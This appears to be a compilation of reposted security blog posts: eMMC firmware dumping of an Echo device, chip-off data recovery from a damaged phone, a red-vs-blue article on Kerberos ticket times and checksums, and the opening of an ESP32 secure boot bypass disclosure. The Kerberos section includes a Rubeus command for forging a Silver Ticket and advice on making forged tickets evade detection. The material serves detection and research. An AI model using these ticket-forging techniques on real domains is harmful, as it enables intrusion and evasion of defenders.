One of the easiest ways to read the chip is using an adapter, such as those from AllSocket. Most eMMC chips have a standard location for the pins needed for power and communication, so the socket breaks out these pins to an SD card you can plug it into a reader. To use this, simply place the chip inside the socket, aligning the dot on the chip with the arrow in the socket, and close it.

Then, plug the adapter into your laptop/SD card reader and it should detect and read the eMMC chip.

To check if your computer detected the chip correctly, run 

dmesg
 in your terminal, and look for a snippet similar to this:

dmesg
 Output

[25103.832356] mmc0: new high speed MMC card at address 0001
[25103.833673] mmcblk0: mmc0:0001 004GE0 3.69 GiB
[25103.834188] mmcblk0boot0: mmc0:0001 004GE0 partition 1 2.00 MiB
[25103.834722] mmcblk0boot1: mmc0:0001 004GE0 partition 2 2.00 MiB
[25103.836965]  mmcblk0: p1 p2 p3 p4 p5 p6 p7 p8
[25104.636138] EXT4-fs (mmcblk0p4): mounting ext3 file system using the ext4 subsystem
[25104.637872] EXT4-fs (mmcblk0p4): warning: maximal mount count reached, running e2fsck is recommended
[25104.638357] EXT4-fs (mmcblk0p4): mounted filesystem with ordered data mode. Opts: (null)
[25104.901046] EXT4-fs (mmcblk0p7): mounting ext3 file system using the ext4 subsystem
[25104.910998] EXT4-fs (mmcblk0p7): mounted filesystem with ordered data mode. Opts: (null)
[25105.165884] EXT4-fs (mmcblk0p5): mounting ext3 file system using the ext4 subsystem
[25105.171570] EXT4-fs (mmcblk0p5): mounted filesystem with ordered data mode. Opts: (null)
[25105.411127] EXT4-fs (mmcblk0p6): mounting ext3 file system using the ext4 subsystem
[25105.420283] EXT4-fs (mmcblk0p6): mounted filesystem with ordered data mode. Opts: (null)
[25105.667704] EXT4-fs (mmcblk0p8): mounting ext3 file system using the ext4 subsystem
[25105.677490] EXT4-fs (mmcblk0p8): mounted filesystem with ordered data mode. Opts: (null)

Mounted Partitions


$ lsblk
NAME          MAJ:MIN RM   SIZE RO TYPE  MOUNTPOINT
mmcblk0       179:0    0   3.7G  0 disk
├─mmcblk0p1   179:1    0   896K  0 part
├─mmcblk0p2   179:2    0    16M  0 part  /mnt/mmcblk0p2-mmc-004GE0_0xf01af56
├─mmcblk0p3   179:3    0    16M  0 part  /mnt/mmcblk0p3-mmc-004GE0_0xf01af56
├─mmcblk0p4   179:4    0    16M  0 part  /mnt/mmcblk0p4-mmc-004GE0_0xf01af56
├─mmcblk0p5   179:5    0   128M  0 part  /mnt/mmcblk0p5-mmc-004GE0_0xf01af56
├─mmcblk0p6   179:6    0     1G  0 part  /mnt/mmcblk0p6-mmc-004GE0_0xf01af56
├─mmcblk0p7   179:7    0     1G  0 part  /mnt/mmcblk0p7-mmc-004GE0_0xf01af56
└─mmcblk0p8   179:8    0   1.5G  0 part  /mnt/data
mmcblk0boot0  179:256  0     2M  1 disk
mmcblk0boot1  179:512  0     2M  1 disk

It’s that easy! Now we can save a full image of the chip and extract all the partitions from there:

$ sudo dd if=/dev/mmcblk0 of=mmcblk0 status=progress bs=16M
3959422976 bytes (4.0 GB, 3.7 GiB) copied, 165 s, 24.1 MB/s
236+0 records in
236+0 records out
3959422976 bytes (4.0 GB, 3.7 GiB) copied, 164.523 s, 24.1 MB/s

$ 7z x mmcblk0
Scanning the drive for archives:
1 file, 3959422976 bytes (3776 MiB)

Extracting archive: mmcblk0
--
Path = mmcblk0
Type = GPT
Physical Size = 3959422976
ID = F9F21FFF-A8D4-5F0E-9746-594869AEC34E

Everything is Ok

Files: 8
Size:       3959274496
Compressed: 3959422976

$ ls -lh
total 7.4G
-rw-r--r-- 1 user  user   16M Mar  3 18:17 boot.img
-rw-r--r-- 1 user  user  1.6G Mar  3 18:17 data.img
-rw-r--r-- 1 user  user  128M Mar  3 18:17 diags.img
-rw-r--r-- 1 user  user   16M Mar  3 18:17 idme.img
-rw-r--r-- 1 user  user  1.0G Mar  3 18:17 main-A.img
-rw-r--r-- 1 user  user  1.0G Mar  3 18:17 main-B.img
-rw-r--r-- 1 root  root  3.7G Mar  3 18:17 mmcblk0
-rw-r--r-- 1 user  user   16M Mar  3 18:17 recovery.img
-rw-r--r-- 1 user  user  896K Mar  3 18:17 xloader.img

Most of these are regular filesystems that can be mounted, so let’s mount them all so we can see what they contain:

$ for i in *.img; do
NAME=$(basename "$i" .img)
mkdir "$NAME"
sudo mount "$i" "$NAME"
done

ust like that, we now have full dump of the Echo’s firmware!

Conclusion

These are all the basics of how to look for eMMC signals on a board, and how to go about reading these chips. The example device used here conveniently had pads for all of the eMMC pins, but this isn’t always the case. Using what you’ve learned here, you can try capturing traces at any components, such as resistors near an eMMC chip to find an alternate pinout.

With the Echo’s firmware dumped, we can start analyzing all the services running on the device searching for vulnerabilities, as well as look into the data stored on the device.

For more details about eMMC, the full standard can be found on JEDEC’s website.

In our next post in the Hardware Hacking 101 series, we’ll be covering ISP. Keep an eye out for it, and contact us at any time with questions or to discuss how we can help with your product security needs!

UPDATE: Thanks to @m33x, we’ve been made aware of Clinton, Cook, et al’s paper which mentions an “eMMC Root” as a possible method in Section IV.A, although that work doesn’t apply or test the method. Also, he mentions Alexa, Are you Listening? which is using debug pads to mount/boot from an external SD card, which is different than what this article shows.

EMMC DATA RECOVERY FROM DAMAGED SMARTPHONE

EMMC DATA RECOVERY FROM DAMAGED SMARTPHONE

Original text by ANDREW

Recently I have received a request to check data recovery possibilities from a damaged Sony Xperia Z5 Premium smartphone. The phone was dropped and it stopped working. No screen, no charging, no communication on any interfaces, no sign of life, it was nothing more than a brick. Well, a brick, with tons of useful data on it without any cloud synchronisation or offline backup. Needless to say how important was for the owner to get his priceless information back from the device.

Some damage identification and recovery probes were already conducted by other professional parties, even a new screen was ordered and tried, but none of the activities provided any promising result. After the failed attempts the owner almost gave up the hope, but fortunately, we had a common acquaintance and this is how I came to the picture.  Due to the previous investigations the phone arrived to me partially dismantled, without a battery and with some metal shields already removed.

As the very first step, I tried to find the data storage. It was quite obvious to identify the memory chip on the PCB, which was a SK hynix H26M64103EMR. This is a simple, 32GB eMMC in a common FBGA package. I had a couple of eMMC related projects in the past, where I had to deal with chip interfacing and direct memory dumping or manipulation. This is often a task in hardware hacking projects I am involved in, for example to gain full access to the OS file system in case of a car head unit or other embedded systems, just to mention another example.

This was the first promising moment to get the owner’s data back. As all of the non-invasive activities failed, I decided to go after the so called “chip-off analysis” technique. This means that the given memory chip has to be removed from the PCB and with the chosen interfacing method its content should be read out directly for further processing.

An important point for this method is that the used encryption settings could be the key  for the success, or for the failure. An enabled or enforced encryption could prevent a successful data recovery, even if the memory chip is not dead and its content could be dumped out. If encryption is in place, the decryption also has to be solved somehow, which is nowadays, with more and more careful design and with properly chosen hardware components, is very challenging or could be (nearly) impossible. Fortunately, at least from data recovery perspective, the owner did not turn on the encryption, so circumstances were given to the next step.

After the PCB was removed from the body, I fixed the board to a metal working surface with kapton tape. Then a little flux was injected around the chip for better heat dispersion and I used a hot air station to reflow the BGA balls and to let me pull of the chip from the PCB.

There are multiple ways to communicate with the eMMC chips. Most of them take advantage of the fact, that these chips are basically MMC (MultiMediaCard) standard memories, but in an embedded (this from where the “e” comes from) format. This means, that as soon as the connection to the necessary chip pins are solved, a simple USB card reader could do the job to read and write the memory. These chips usually support multiple communication modes, using e.g. 8 bit or 4 bit parallel interface or a single 1 bit interface. For an easy setup and without special tools usually the 1 bit mode is used. The only criteria for this method is that the reader also has to support 1 bit mode (Transcend USB card readers seems to be good candidates for this job). In such case only CMD, CLK, DAT0, VCC (VCC, VCCQ) and GND (VSS, VSSQ) pins have to be connected. Do not be afraid of the lot of pins, in fact, only a couple of ones are used. The pinout is generic and based on JEDEC standard, so regardless of the vendor or the chip you are dealing with, it is almost sure that you will find the important pins at well known location, as it is showed in the picture below.

I made these connections in the past by manually soldering 0.1mm insulated copper wires to the given BGA balls then wire them directly to the reader. If you have stable hand and good enough soldering skills then it is absolutely not impossible. There are cases when you have to deal with logic level shifting and multiple voltages (different voltage for memory and Flash I/O /this is the VCC/ and for the memory controller core and MMC I/O /which is the VCCQ/), so always be careful and read the datasheet or measure the given voltage levels first. This time, I had a better toolset available, so I used a SD-EMMC plus adapter connected to an E-Mate Pro eMMC Tool. Using this combination it was possible to simply put the removed eMMC chip to the BGA socket without any custom wiring and to communicate with it with a simple USB card reader.

As I attached the tool to my linux machine it recognised the device as an USB mass storage and it was ready to use.


&#91; 700.932552] usb 1-2: new high-speed USB device number 5 using xhci_hcd
&#91; 701.066678] usb 1-2: New USB device found, idVendor=8564, idProduct=4000
&#91; 701.066693] usb 1-2: New USB device strings: Mfr=3, Product=4, SerialNumber=5
&#91; 701.066702] usb 1-2: Product: Transcend
&#91; 701.066709] usb 1-2: Manufacturer: TS-RDF5
&#91; 701.066716] usb 1-2: SerialNumber: 000000000036
&#91; 701.129205] usb-storage 1-2:1.0: USB Mass Storage device detected
&#91; 701.130866] scsi host0: usb-storage 1-2:1.0
&#91; 701.132385] usbcore: registered new interface driver usb-storage
&#91; 701.137673] usbcore: registered new interface driver uas
&#91; 702.132411] scsi 0:0:0:0: Direct-Access TS-RDF5 SD Transcend TS3A PQ: 0 ANSI: 6
&#91; 702.135476] sd 0:0:0:0: Attached scsi generic sg0 type 0
&#91; 702.144406] sd 0:0:0:0: &#91;sda] Attached SCSI removable disk
&#91; 723.787452] sd 0:0:0:0: &#91;sda] 61079552 512-byte logical blocks: (31.3 GB/29.1 GiB)
&#91; 723.809221] sda: sda1 sda2 sda3 sda4 sda5 sda6 sda7 sda8 sda9 sda10 sda11 sda12 sda13 sda14 sda15 sda16 sda17 sda18 sda19 sda20 sda21 sda22 sda23 sda24 sda25 sda26 sda27 sda28 sda29 sda30 sda31 sda32 sda33 sda34 sda35 sda36 sda37 sda38 sda39 sda40 sda41 sda42 sda43

The device was mapped to “sda” device. As you can see from the “dmesg” extract above, there were a lot of partitions (sda1 – sda43) on the filesystem. Before moving forward, as always in a case like this, the first step was to create a dump from the memory chip, then conduct the next steps on an offline backup. The “dd” tool could be used for this purpose:


$ dd if=/dev/sda of=sony_z5p.img status=progress

With the full dump it was safe to continue the analysis. Using “parted” I checked the partition structure:


Model: (file)
Disk /mnt/hgfs/kali/sony_z5p/sony_z5p.img: 31.3GB
Sector size (logical/physical): 512B/512B
Partition Table: gpt
Disk Flags:

Number Start End Size File system Name Flags
1 131kB 2228kB 2097kB TA
2 4194kB 21.0MB 16.8MB ext4 LTALabel
3 21.0MB 105MB 83.9MB fat16 modem msftdata
4 105MB 105MB 131kB pmic
5 105MB 105MB 131kB alt_pmic
6 105MB 105MB 1024B limits
7 105MB 106MB 1049kB DDR
8 106MB 106MB 262kB apdp
9 106MB 107MB 262kB msadp
10 107MB 107MB 1024B dpo
11 107MB 107MB 524kB hyp
12 107MB 108MB 524kB alt_hyp
13 109MB 111MB 1573kB fsg
14 111MB 111MB 8192B ssd
15 111MB 112MB 1049kB sbl1
16 112MB 113MB 1049kB alt_sbl1
17 113MB 115MB 1573kB modemst1
18 117MB 119MB 1573kB modemst2
19 119MB 119MB 262kB s1sbl
20 119MB 120MB 262kB alt_s1sbl
21 120MB 120MB 131kB sdi
22 120MB 120MB 131kB alt_sdi
23 120MB 121MB 1049kB tz
24 121MB 122MB 1049kB alt_tz
25 122MB 122MB 524kB rpm
26 122MB 123MB 524kB alt_rpm
27 123MB 124MB 1049kB aboot
28 124MB 125MB 1049kB alt_aboot
29 125MB 192MB 67.1MB boot
30 192MB 226MB 33.6MB rdimage
31 226MB 259MB 33.6MB ext4 persist
32 259MB 326MB 67.1MB FOTAKernel
33 326MB 327MB 1049kB misc
34 327MB 328MB 524kB keystore
35 328MB 328MB 1024B devinfo
36 328MB 328MB 524kB config
37 331MB 436MB 105MB rddata
38 436MB 447MB 10.5MB ext4 apps_log
39 449MB 466MB 16.8MB ext4 diag
40 466MB 780MB 315MB ext4 oem
41 780MB 990MB 210MB ext4 cache
42 990MB 25.8GB 24.8GB ext4 userdata
43 25.8GB 31.3GB 5513MB ext4 system

Only one partition, the “userdata” was relevant for the recovery. Using “losetup” it is possible to automatically mount every recognised partition from the image, or only the chosen one by specifying e.g. the proper partition offset in the image.

$ losetup -Prf sony_z5p.img

As soon as the filesystem was mounted the recovery was not a big deal anymore. It is public knowledge where and how Android and common applications store stuffs such as contacts, text messages or pictures. For other applications it is also quite easy to reveal the details by crawling their application folders and by checking their database files.

Based on the owner’s request I focused only on some data:

  • Contacts
    • Format: SQLite database
    • Path: /data/com.android.providers.contacts/databases/contacts2.db
  • Text messages
    • Format: SQLite database
    • Path: /data/com.google.android.gms/databases/icing_mmssms.db
  • Downloaded files
    • Format: simple files
    • Path: /media/0/Download
  • Pictures and videos
    • Format: simple files
    • Path: /media/0/DCIM
  • Viber pictures and videos
    • Format: simple files
    • Path: /media/0/viber/media

With a rooted spare device it could be possible e.g. to replace the database files on the new device to the recovered ones to let the phone parse and show the data for further processing, however standard users will not be able to do this. For me, it was easier to go after the direct recovery, instead of playing with another phone. Picture and multimedia files do not need special care as those just had to be saved without any post processing, but in case of other data stored in SQLite databases the extract should take care about the given database structure and the generated output should be something which could be read by humans or could be processed by other tools.

I found a “dump-contacts2db” script on GitHub which was good to parse the contact database and export the items to a common vCard format. This is something which a user can later import to several applications and sync back to the new phone.

For the text messages I did not find anything useful, so I quickly checked the corresponding data structure in the SQLite database:


CREATE TABLE mmssms(
_id INTEGER NOT NULL,
msg_type TEXT NOT NULL,
uri TEXT NOT NULL,
type INTEGER,
thread_id INTEGER,
address TEXT,
date INTEGER,
subject TEXT,
body TEXT,
score INTEGER,
content_type TEXT,
media_uri TEXT,
read INTEGER DEFAULT 0,
UNIQUE(_id,msg_type) ON CONFLICT REPLACE);

It was not too complex, so in 2 minutes I made a quick and dirty but working script to extract the text threads to CSV files:


#!/bin/bash

for thread in $(sqlite3 icing_mmssms.db 'select distinct thread_id from mmssms'); do
  address=`sqlite3 icing_mmssms.db 'select distinct address from mmssms where thread_id = '"$thread" | sed 's/&#91;^0-9]*//g'`
  sqlite3 -csv icing_mmssms.db 'SELECT datetime(date/1000, "unixepoch","localtime"), address, msg_type, body from mmssms where thread_id = '"$thread"' order by date' > sms_with_${address}_thread_${thread}.csv
done

All done, this was the last step to recover every requested file and info from the phone. I did not spend too much time on the recovery itself and the whole process was also fun for me, especially by knowing the fact that others have failed before me.

Challenge accomplished 🙂

RED VS. BLUE: KERBEROS TICKET TIMES, CHECKSUMS, AND YOU!

RED VS. BLUE: KERBEROS TICKET TIMES, CHECKSUMS, AND YOU!

Original text by Andrew Schwartz in Incident ResponseIncident Response & ForensicsPenetration TestingPurple Team Adversarial Detection & CountermeasuresThreat Hunting

1    INTRODUCTION

At SANS Pen Test HackFest 2022, Charlie Clark (@exploitph) and I presented our talk ‘I’ve Got a Golden Twinkle in My Eye‘ whereby we built and demonstrated two tools that assist with more accurate detection of forged tickets being used. Although we demonstrated the tools, we stressed the message of focusing on the technique of decrypting tickets rather than the tools themselves.

As we dove into our research of building IOAs, we often found ourselves examining ticket times and checksums and were repeatedly surprised by the lack of information from both Red and Blue perspectives for the ticket times and the checksums of Kerberos tickets. As such, this post will provide a more in-depth background to explain their importance and how/why understanding them can better serve offensive and defensive operators.

2    TICKET TIMES

2.1      BACKGROUND OF TICKET TIMES

In Kerberos, each ticket contains three timestamps. These times govern the period for which the ticket is valid. The three times are: 

  • Start Time[1] – The time from which the ticket becomes usable
  • End Time – Calculated from the Start time and the time the ticket becomes unusable
  • Renew Time – Calculated from the Start time and the duration of renewal[2]

Both Blue and Red teams should be especially cognizant of the ‘End’ and ‘Renew’ times. The understood limits for these times are stored in the Kerberos Policy within the domain GPO. While it’s true that this policy determines the max values for these times, in many situations it is the account configuration and group membership that take a higher priority. It is important to know that the times discussed in the rest of this section define or calculate the maximum value for the relevant time and that a ticket can always be requested for a time before the maximum.

Within the Kerberos Policy there are three settings relevant to ticket times:

  • Maximum lifetime for a service ticket – the number of minutes from the Start Time that a service ticket’s End Time can be
  • Maximum lifetime for a user ticket – the number of hours from the Start Time that a TGT’s End Time can be
  • Maximum lifetime for user ticket renewal – the number of days from the Start Time that a TGT’s Renew Time can be

The following is a screenshot of the default values for these settings:

Figure 1 – Example of Default GPO Kerberos Policy and klist output

(The above screenshot is courtesy of Wendy Jiang of Microsoftanswering a question on Microsoft’s forum.)

2.1.1     TICKET TIMES AND THE PROTECTED USERS GROUP

In AD domains with at least one 2012+ Windows domain controller, there is a group called Protected Users that provides ‘enhanced security‘ through membership. The Protected Users group has multiple facets; however, the protection relevant to ticket times is that both End and Renew Times have their max values set to four hours, meaning the maximum for both times is the ticket Start Time + four hours. However, looking at the documentation, this is far from clear: 

Figure 2 – Microsoft’s Documentation on Domain Controller Protections for Protected Users

2.1.2     LOGON HOURS

Within AD, a feature exists to restrict when a user can or cannot log on. This can be configured individually on the user’s properties. The hours can be configured as either permitted or denied.

Figure 3 – Account Logon Hours Configuration Settings

Each block in this table represents an hour of the day, and this translates to a bit in the logonHoursattribute of that user account.

Figure 4 – Logon Hours Value in Hexadecimal

For tickets to the kadmin/changepw service, the End and Renew Times are two minutes after the Start Time.

2.2      TICKET TIMES FOR BLUE TEAMS

To detect a forged ticket, it is imperative for a Blue team to inspect the times associated with the ticket. This can greatly increase the chances of detecting anomalous activity. One of the most well-known IOAs associated with a Golden Ticket is the default End and Renew time of 10 years minus two days. A savvy attacker can easily employ OPSEC to avoid this IOA. However, we can still have great success in catching ‘smash and grab’ attackers. 

An interesting control Blue teams can employ is to create a higher priority policy than the Default Domain Policy and set the Kerberos Policy to non-default. As attackers generally only look at the Default Domain Policy for the times when forging tickets, it is likely many will miss the policy that takes a higher priority. It is important to note that the times need to be set lower and not higher than the Default Domain Policy, as tickets with times lower than the max values are still valid. Below, we have created a new policy and moved it to be the first position in the GPO link order.

Figure 6 – ‘Custom’ Policy in Link Order Position 1

Now, let’s look at our example user ironman and proceed to forge a Golden Ticket. (Note: For this demonstration, OPSEC is not employed.)

Figure 7 – Golden Ticket With Wrong Ticket Times

Looking at our Golden Ticket for ironman, we can clearly see that the EndTime and RenewTill times are wrong as they are based off the Default Domain Policy and not the ‘custom’ policy that was prioritized. In contrast, the screenshot below shows a genuine, initial TGT (#1) that has the End Time of nine hours after the Start Time, matching the new custom Kerberos Policy for user tickets, and a delegated TGT (#0) that has the End Time of eight hours and 20 minutes (or 500 minutes), matching the custom Kerberos Policy for service tickets. This also highlights the importance of making the service ticket lifetime different (lower) than the user ticket (TGT) lifetime. Both tickets have the new Renew Time of six days.

Figure 8 – Genuine Tickets With Times Based on ‘Custom’ Domain Policy

Our tool WonkaVison automates most of these checks but does not, at the time of this post, examine the correct order of GPO Policy or their priorities.

Tier-0 accounts with a greater level of privilege in a domain are often high-value targets (HVTs) for attackers. As such, the Blue team can add these users to the Protected Users group for enhanced protection features. Given that users within the Protected Users group have restricted ticket times, the Blue team can use this to detect forged tickets by attackers that do not take this into account. Note: Per the official Microsoft Documentation, service and computer accounts “…should never be members of the Protected Users group”. It is also good security practice to ensure these accounts are not highly privileged.  

Additionally, the Blue team can use AD’s feature of restricting logonHours to their advantage. By enabling, tracking, and alerting, a user attempting to log on during a restricted time can be an IOA of an attacker, as it may be anomalous, using a compromised account.

It is important to note that the restriction of logonHours will not prevent the actual usage of the Golden Ticket. However, it will prevent the ability to request an initial TGT (ASKTGT).

Figure 9 – ASKTGT With Error KDC_ERR_CLIENT_REVOKED

If we check our Windows EVTX logs filtering on Kerberos events (generally EIDs: 4768 and 4769), we get the following event:

Figure 10 – 4768 Event With KDC_ERR_CLIENT_REVOKED

Most notably, Ticket Encryption Type (0xFFFFFFFF) translates to This type shows in Audit Failure events, and the Failure Code (0x12) resolves to KDC_ERR_CLIENT_REVOKED. From a deterrence point of view, we can see the benefit of this control. However, from a detection/hunt/DFIR point of view, this event by itself would not have high fidelity in catching an attacker, as it would most likely be prevalent in most organizations. Granted, as the event does have the source IP address in question, the event can be correlated with EID 5156, as shown by Jonathan Johnson’s (@jsecurity101research.

2.3      TICKET TIMES FOR RED TEAMS

As previously discussed, the Protected Users group provides added security controls to its members to boost IAM. By enumerating its members, an attacker can identify which users are restricted and can then tailor forged tickets to blend in more normally within the restricted operating times, making it harder for defenders to identify anomalous activity. 

As noted, the logonHours attribute is in raw bytes and is not easily human readable as a result. An attacker or Red teamer reading this attribute prior to forging a ticket can be extremely beneficial for evading detection when attempting to compromise another (e.g., lateral movement) asset. Charlie Clark’s fork of PowerView automatically converts the logonHours attribute to a more readable form.

Figure 11 – Logon Hours by User Enumerated via Charlie Clark’s Fork of PowerView

As we can see in the above screenshot, the user ironman is restricted from logging on during the hours of 2300 – 0300 on Thursdays. This means that if the domain policy for the End and Renew Times of the ticket is longer than the next time where logon is restricted, then these will become the new End and Renew times.

The Red team should be aware of when a user can log on, because if they use a forged ticket during a user’s restricted hours, the Blue team could use a Windows Event ID 4769 to see if a service ticket was successfully requested. A logon during a restricted time would be anomalous as this would not be possible during normal operations. 

Additionally, the Red team can enumerate the Kerberos Domain Policy. This can be performed with a recent commit Charlie Clark made to his fork of PowerView.

Figure 12 – Charlie Clark’s PowerView Get-DomainGPOStaus cmdlet

Here, not only is the GPO priority shown for the given organizational unit (OU) but also the various statuses of the GPO. This function, however, does not consider inheritance, but for this particular usage, that should not be an issue. By knowing this information, we can then calculate the correct values and pass them to Rubeus manually when forging a ticket.

Note: Charlie Clark also has a function Get-RubeusForgeryArgs within PowerView that automates the calculation of the ticket times. However, for the user ironman, the reason Get-RubeusForgeryArgs has not added the EndTime and RenewTill arguments is that, at the time of execution, ironman is not allowed to log on as specified by the logonHours. Because ironman is also not a member of the Protected Users group, Get-RubeusForgeryArgs has defaulted back to the Kerberos Policy, and since it only looks at the Default Domain Policy, which is set to defaults, it hasn’t added the arguments.

Figure 13 – Domain User With Restricted logonHours

Using Get-RubeusForgeryArgs against a regular user, the script has not taken into account the higher priority GPO Policy that was created above and incorrectly calculates the times to be the defaults, thus leaving the arguments out again.

Figure 14 – Regular Domain Admin

Get-RubeusForgeryArgs correctly calculates the End and Renew Times for the user thor, a member of the Protected Users group.

Figure 15 – User ‘thor’ in Protected Users Group

3    CHECKSUMS

3.1      BACKGROUND OF CHECKSUMS

Another key part of the ticket that caught our eye during our research was the Checksums. There are several types of checksums stored in the ticket, depending on the type of ticket. These checksums are there to prevent the ticket from manipulation. One thing to keep in mind for the next sections is that the words Checksum and Signature are used interchangeably.

Originally, there were two checksums (Server and KDC). As a result of the Bronze Bit Attack, Microsoft implemented the Ticket Checksum. More recently, Microsoft implemented the FullPAC Checksum as a result of CVE-2022-37967.

Microsoft’s documentation on PAC_SIGNATURE_DATA, which is the name of the structure within the PAC where a checksum and its type are stored, can be found here.

3.2      TYPES OF CHECKSUMS

3.2.1     SERVER CHECKSUM

The Server Checksum is generated by the KDC and covers the PAC with the Server and KDC Checksum signatures ‘zeroed’ out (each byte of the signature buffer set to zero). The key that is used to encrypt the ticket is also used to create the checksum.

Microsoft’s documentation on the Server Signature can be found here.

3.2.2     KDC CHECKSUM

The KDC Checksum protects the Server Checksum and is signed by the KRBTGT key.

Microsoft’s documentation on the KDC Signature can be found here.

3.2.3     TICKET CHECKSUM

The Ticket Checksum was introduced to protect the encrypted part of the ticket from modification. The Bronze Bit attack took advantage of the fact that, for an S4U2Self ticket, the requesting account could decrypt the ticket, modify the encrypted part, re-encrypt it, and use the ticket. The Ticket Checksum covers the encrypted part of the ticket with the PAC set to 0 (a single byte set to zero).

Microsoft’s documentation on the Ticket Signature can be found here.

3.2.4     FULLPAC CHECKSUM

The FullPAC Checksum was introduced to protect the PAC from an RC4 attack. As a result, Microsoft released an OOB patch in the November 2022 patches. As it stands, this signature is in audit mode until October 2023 when Microsoft will begin automatic enforcement of this signature. Interestingly, as of writing this blog post, this signature has not been documented on Microsoft’s website.

Figure 16 – List of Kerberos Checksums Documented From Microsoft

The FullPAC Checksum is essentially the same as the Server Checksum but signed with the KRBTGTkey. So, it covers the whole PAC with the Server and KDC Checksums zeroed out.

Note: Ticket and FullPAC Checksums are not present in TGTs or referrals. They are only present in service tickets.

For the next two sections, we are mainly going to focus on service tickets and referrals. The reason for this is that local TGTs are protected by the KRBTGT key and therefore only contain the Server and KDC Checksums, which are both signed with the KRBTGT key. If an attacker can forge a TGT, then they can also sign both checksums correctly. However, this is not the case for service tickets and referrals. While genuine referrals lack the Ticket and FullPAC Checksums, the KDC Checksum is still signed with the KRBTGT key while the trust key is used for the Server Checksum and ticket encryption.

3.3      CHECKSUMS FOR BLUE TEAMS

For the Blue team, having the ability to gain telemetry into the PAC to view the checksums is a significant indicator that a forged ticket has been created and most likely used. To help identify forged tickets via the use of checksums, we have created the ‘Charlie Checksum Verification Test’.

In this example, I have supplied the following command to Rubeus to generate a Silver Ticket:

Rubeus.exe silver /aes256:<aes256_key> /ldap /user:thor /service:cifs/asgard-wrkstn.marvel.local /nowrap

Our terminal output will show the following, noting that the ServiceKey and the KDCKey are the same.

Figure 17 – Rubeus Silver Ticket Creation Without krbkey

If we describe our Silver Ticket and use the ServiceKey and the actual KRBTGT key via the /krbkeyparameter, we can verify any checksum that has been signed with the KRBTGT key (i.e., the KDC, Ticket, and FullPAC Checksums). We will see in the next screenshot that these checksums are INVALID. This indicates, but does not solidify or confirm, that the service ticket is forged. The exception being that the KRBTGT key may have been rotated since the creation of the service ticket, further checks would be required to determine this.

igure 18 – Rubeus Describe of Silver Ticket With Actual KRBTGT Key

It would be better for the Blue team to first check with the ServiceKey as the /krbkey. If that matches, then you have a forged ticket!

Figure 19 – Rubeus Description of Silver Ticket With ServiceKey as KRBTGT Key

3.4      CHECKSUMS FOR RED TEAMS

All four checksums have been implemented into Rubeus, with the last being merged with this PR. However, this is currently not the case with the main branches of Mimikatz and Impacket.

Part of the Red team’s greatest weapon in their arsenal is the employment of OPSEC. The more similar a forged ticket is to a genuine ticket, the more difficult it is to detect.

The advantage of using Rubeus for Silver Ticket creation is the ability to pass the /krbkey, which will then be used to sign any checksum that is normally signed by the KRBTGT key. To best avoid detection, a Red teamer should use the real KRBTGT key. However, if one does not have the real KRBTGT key, a false one can be easily passed to Rubeus, which has a higher likelihood of avoiding detection than using the ServiceKey.

4    CONCLUSION

Our main purpose of this post, while this information is not ‘new’ or ‘revolutionary’, is to show how an intimate understanding of normal operations can help both Blue and Red teams in detection and OPSEC, respectively.

While gaining access to the encrypted part of Kerberos tickets may be a challenge for Blue teams, the importance of doing so for detection cannot be emphasized more. However, while it is not possible to review the checksums without decrypting the tickets, the ticket times are more easily accessible through commands like 

klist
 or the underlying call to LSA that 
klist
 makes use of.e

For Red teams, the ability to blend in with normal operations is a high priority. While it may not be possible to completely emulate normal behavior, such as using a Silver Ticket when the KRBTGT key is not available, understanding what Blue teams may look for to definitively determine malicious activity will always be beneficial.

Ultimately, all of us are working to improve security in a positive way, and that happens best when everyone has more information about how everything works.

5    ACKNOWLEDGEMENTS

A special thank you to the following individuals for helping review this post:

Elad Shamir (@elad_shamir)

Carlos Perez (@Carlos_Perez)

Julie Daymut

Megan Nielsen (@mega_spl0it)

Roza Maille

Jessica Sheneman


[1]. Technically, there is also Auth Time. Most often, Start Time and Auth Time are the same. For simplicity, we will not focus on Auth Time. If there is an Auth Time that is vastly different from the Start Time, the ticket will likely be issued for the future, in which case the Start Time of the ticket is the time from which when the End and Renew Times are calculated.

[2]. Keep in mind the ticket must be renewed before the End Time.

Pwn the ESP32 Secure Boot

Pwn the ESP32 Secure Boot

Original text by  LimitedResults

In this post, I focus on the ESP32 Secure Boot and I disclose a full exploit to bypass it during the boot-up, using low-cost fault injection technique.

Espressif and I decided to go to Responsible Disclosure for this vulnerability (CVE-2019-15894).

The Secure Boot

Secure boot is the guardian of the firmware authenticity stored into the external SPI Flash memory.

It is easy for an attacker to reprogram the content of the SPI Flash memory, then to run its malicious firmware on the ESP32. The secure boot is here to protect against this kind of firmware modification.

It creates a chain of trust from the BootROM to the bootloader until the application firmware. It guarantees the code running on the device is genuine and cannot be modified without signing the binaries (using a secret key). The device will not execute untrusted code otherwise.

ESP32 Secure boot details

Espressif provides a complete online documentation here, dedicated to this feature.

How it works?

Secure boot is normally set during the production (at the factory), considered as a secureenvironment.

During the Production

Secure boot key (SBK) into e-Fuses

The ESP32 has a One Time Programmable (OTP) memory, based on four blocks of 256 e-Fuses (total of 1024 bits).

The Secure Boot Key (SBK) is burned into the eFuses BLK2 (256 bits) during the production. This key is then used by AES-256 ECB mode by the BootROM to verify the bootloader. According to Espressif, the SBK cannot be readout or modify (the software cannot access the BLK2 block due to the Read/Write Protection eFuse). 

This key has to be kept confidential to be sure an attacker cannot create a new bootloader image. It is also a good idea to have a unique key per device, to reduce the scalability if one day, the SBK is leaked or recovered.

ECDSA key Pair

During the production phase, the vendor will also create an ECDSA key pair ( private key and public key).

The private key has to be kept confidential. The public key will be included at the end of the bootloader image. This key will be in charge to verify the signature of the app image.

The digest

At the address 0x00000000 in the SPI flash layout, a 192-bytes digest has to be flashed. The output digest is 192 bytes of data is composed by 128 bytes of random, followed by the 64 bytes SHA-512 digest computed such as:

Digest = SHA-512(AES-256((bootloader.bin + ECDSA publ. key), SBK))

On the field now

During the boot-up, the secure boot process is the following:

Reset vector > ROM starts > ROM Loads and verifies Bootloader image (using SBK in OTP) > Bootloader is running > Bootloader loads and verifies App image > App image is running

The BootROM verification

After the reset, the CPU0 (PRO_CPU) executes the BootROM code (stage 0), which will be in charge to verify the bootloader signature. Then, the bootloader image (present at 0x1000 in the flash memory layout) is loaded into SRAM and the BootROM verifies the bootloader signature. If result is ok, the CPU0 then executes the bootloader (stage 1).

About The ECDSA verification

Micro-ECC (uECC) library is used to implement the ECDSA verification in the bootloader image, to verify the app image signature (stage 2).

I noticed this previous vulnerability CVE-2018-18558. It was fixed in esp-idf v3.1.

Focus on Stage 0

